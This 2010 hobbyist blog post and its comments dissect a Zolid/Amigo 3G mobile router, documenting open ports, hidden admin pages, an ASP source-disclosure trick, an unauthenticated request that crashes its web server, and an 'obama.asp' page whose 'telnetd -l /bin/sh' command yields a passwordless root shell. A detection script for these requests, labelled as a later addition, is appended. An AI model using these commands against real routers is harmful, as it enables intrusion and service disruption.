Ivo's blog

Hacks, code and random thoughts

Hacking the Zolid Mobile Router

written by ivo, on Jul 14, 2010 9:46:00 AM.

I recently bought a Zolid “wireless mobile router” at a local ALDI store. It’s a nifty little device with 2xUSB, 2xUTP, and b/g/n wireless. You can plug it directly in a socket or power it through micro USB. It also claims to have support for a wide range of 3G dongles so you can use it as a mobile 3G access point. It resembles some of the Linux plug servers like SheevaPlug and GuruPlug. Here are some of my findings:

Versions

The Zolid (an ALDI brand) is a rebranded “Amigo 3R161N”, which is also sold by Solwise as the 3g11nmrw and as the E-Top 3r161n, though I can’t find it on the E-Top website.

Software details

As I expected, it runs Linux:

Linux version 2.6.19 (root@localhost.localdomain) (gcc version 3.4.6-1.3.5) #1 Fri Feb 26 17:00:34 CST 2010

It has firmware “ver1.1.5” installed.

It uses the “GoAheader-Webs” webserver

It uses Pure-FTPd as FTP server

Firmware

It didn’t ship with a firmware on the CD. Unisupport.net (responsible for Zolid support) doesn’t offer anything for download either, and neither does Amigo. However, Solwise does have two firmwares available at the bottom of their product page.

I haven’t yet succeeded in dissecting the firmware (which helps to find backdoors, exploits, and so on, and may provide an opportunity to create a customized firmware). I think it starts with a “config.dat” file, but I have to research this further.

Hacks, details

Appending %00 to a .asp URL (other characters also work, e.g. ///) returns the unrendered source of the ASP page. For example: http://192.168.1.132/status.asp%00

nmap reports the following open ports and fingerprint:

Interesting ports on default.fritz.box (192.168.1.132):
Not shown: 994 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
515/tcp   open  printer
49152/tcp open  unknown
MAC Address: 00:08:A1:C8:C9:C4 (CNet Technology)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=7/14%OT=21%CT=1%CU=32750%PV=Y%DS=1%G=Y%M=0008A1%TM=4C3D6DD
OS:3%P=i686-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=U)OPS(O1=
OS:M5B4NNS%O2=M5B4NNS%O3=M5B4%O4=M5B4NNS%O5=M5B4NNS%O6=M5B4NNS)WIN(W1=16D0%
OS:W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4N
OS:NS%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=4
OS:0%W=16D0%S=O%A=S+%F=AS%O=M5B4NNS%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)

I have been able to find the following additional pages that are not part of the current navigation:
  • opmode.asp
  • one_button.asp
  • ap_one_button.asp
  • wifi_one_button.asp
  • tcpipwan.asp
  • qos.asp
  • downloadserver.asp (*)
  • stats.asp
(*) may crash the internal web server.

Crashing the web server is easy (no authentication required):

wget 'http://192.168.1.132/goform/foo'

Accessing “config.dat” will offer a download containing, I assume, the device’s configuration. It’s probably related to the saveconf.asp page. This file resembles the start of the firmwares I’ve been able to find.

Update

Thanks to info provided by Remco van Mook I’ve found a page on the Sapido gr-1102 which mentions an “obama.asp” page. It also works on the Zolid, and it allows you to execute arbitrary commands!

Executing /usr/sbin/telnetd -l /bin/sh as command will give you an immediate root shell through telnet.
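
A detection sketch for the requests described in “Hacks, details” and “Update”, added here as an example and not part of the original post: it flags the .asp suffix trick, the pages missing from the navigation, obama.asp, and unknown /goform/ handlers. It assumes a reverse proxy or IDS in front of the router writes Common Log Format lines; the log lines and the KNOWN_FORMS allowlist are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Pages the post lists as reachable but missing from the navigation.
HIDDEN_PAGES = {"opmode.asp", "one_button.asp", "ap_one_button.asp",
                "wifi_one_button.asp", "tcpipwan.asp", "qos.asp",
                "downloadserver.asp", "stats.asp"}
# Assumption: handlers the web UI really posts to (hypothetical name).
KNOWN_FORMS = {"formExampleSave"}
REQUEST = re.compile(rb'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# ".asp" followed by a NUL byte or by trailing slashes, as in the post.
ASP_SUFFIX_TRICK = re.compile(rb"\.asp(?:\x00.*|/+)$", re.I | re.S)


def classify(log_line: bytes) -> list:
    """Return the findings for one Common Log Format line."""
    m = REQUEST.search(log_line)
    if not m:
        return ["unparsable"]
    path = unquote_to_bytes(m.group(1).split(b"?", 1)[0])  # decodes %00
    findings = []
    if ASP_SUFFIX_TRICK.search(path):
        findings.append("asp-source-disclosure")
    # Page name with the appended bytes stripped: cut at NUL, drop slashes.
    name = path.split(b"\x00", 1)[0].rstrip(b"/").rsplit(b"/", 1)[-1]
    name = name.decode("latin-1")
    if name.lower() == "obama.asp":
        findings.append("command-exec-page")
    elif name.lower() in HIDDEN_PAGES:
        findings.append("hidden-page")
    if path.lower().startswith(b"/goform/") and name not in KNOWN_FORMS:
        findings.append("unknown-goform-handler")
    return findings


# Constructed sample log lines (not captured from a real device).
SAMPLE = [
    b'192.168.1.50 - - [14/Jul/2010:09:40:01 +0200] "GET /status.asp HTTP/1.1" 200 5120',
    b'192.168.1.77 - - [14/Jul/2010:09:41:12 +0200] "GET /status.asp%00 HTTP/1.1" 200 7340',
    b'192.168.1.77 - - [14/Jul/2010:09:41:15 +0200] "GET /status.asp/// HTTP/1.1" 200 7340',
    b'192.168.1.77 - - [14/Jul/2010:09:42:03 +0200] "GET /goform/foo HTTP/1.1" 502 0',
    b'192.168.1.77 - - [14/Jul/2010:09:43:30 +0200] "GET /obama.asp HTTP/1.1" 200 900',
    b'192.168.1.77 - - [14/Jul/2010:09:44:02 +0200] "GET /qos.asp HTTP/1.1" 200 4100',
]


def scan(lines):
    """Return (line_number, findings) for every line with a finding."""
    return [(i, f) for i, l in enumerate(lines, 1) if (f := classify(l))]
```

Calling scan(SAMPLE) returns the flagged line numbers with their findings; replace KNOWN_FORMS with the handlers your own firmware's pages submit to before relying on the goform rule.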

Remaining questions

  • How can we dissect the firmware?
  • Shouldn’t sources and licenses be provided somewhere?
  • How can we hack/exploit this device?

Please keep an eye on this page for further updates. Respond in the comments if you have found anything interesting.

Comments

  • Hi Ivo,

    here are some more goodies. The same product is also on the market as:

    ‘palm server router PE8074’
    ‘7link AWR120g’
    ‘Sapido GR-1102’

    And according to a Russian OpenWRT forum posting here: open-wrt.ru/forum/viewtopic.php?id=13610 the internal hardware is pretty much identical to the Linksys WAP4400N and WRVS4400N devices, for which a full source tree is available.

    I’ll continue digging :)

    Comment by Remco — Jul 14, 2010 3:49:30 PM

  • Heye wow! I wish I’d spent an extra half hour digging through this yesterday. Obama - who’d have thought.

    Comment by Remco — Jul 15, 2010 2:55:07 PM

  • Hi Ivo,

    The MAC address (00:08:A1:xx:xx:xx) and the title of the list on
    www.unisupport.net/download/50673/approved_3g_dongles.pdf point in the direction of:
    www.cnet.com.tw/html/productCWR-935M-a.htm

    Comment by ahhing — Jul 23, 2010 12:34:50 AM

  • Some of the specs I gathered using obama.asp and then telnet:

    CPU: MIPS RTL8652 / R3000
    RAM: 23576 Kb

    Fun files? /bin/bittorrent.sh . /bin/ping6

    Content of /etc/hosts: 172.20.1.254 rtl8181.realtek.com.tw rtl8181

    So maybe rtl8181.sourceforge.net/ can run on it?

    Comment by Job Snijders — Jul 28, 2010 12:23:51 PM

  • Looking forward to hacking this device as well…

    https://forum.openwrt.org/viewtopic.php?id=25930

    My take on a similar device (only 1 USB, without NAS functions)…

    byfai.com/content/sapido-rb-1132-compact-wireless-router

    Cheers.

    Comment by Lo Yuk Fai — Aug 8, 2010 2:03:14 PM

  • @LoYukFai It’s very similar to the Zolid and Sapido GR-1102. Have you tried the obama.asp trick?

    I understand openwrt support is nearly complete, let’s hope it works for your device as well.

    Comment by ivo — Aug 9, 2010 8:19:17 AM

    • obama.asp works! However, telnetd prompts me for a password and I have no idea whatsoever.

      Anyway, I have got some information via the web interface and posted them on forum.openwrt.org

      Pardon my ignorance, but what’s the OpenWrt status on this stuff…?

      BTW, I just noticed that my device makes some small buzzing noise during operation, does yours do as well…?

      Comment by Lo Yuk Fai — Aug 12, 2010 7:35:55 PM

      • Are you executing the command “/usr/sbin/telnetd -l /bin/sh”? That should give you an immediate, passwordless rootshell.

        Keep an eye on aliosa27.net/blog/?p=26 for openwrt news - that’s all I know as well.

        No noises here…

        Comment by ivo — Aug 16, 2010 2:51:15 PM

  • Yes, that’s the command I executed.

    I’ll keep an eye on that blog post, thanks for the heads-up.

    I noticed that the small buzzing sound is only emitted during USB-power operation.

    Cheers.

    Comment by Lo Yuk Fai — Aug 17, 2010 2:41:15 PM

  • Hi,

    the Zolid router doesn’t recognize my NTFS partition on my external HD drive. It has 1 partition FAT32 and 1 NTFS. The FAT32 is recognized, the NTFS isn’t. Do you know how I can get the NTFS partition visible?

    Comment by john — Aug 23, 2010 2:00:37 PM
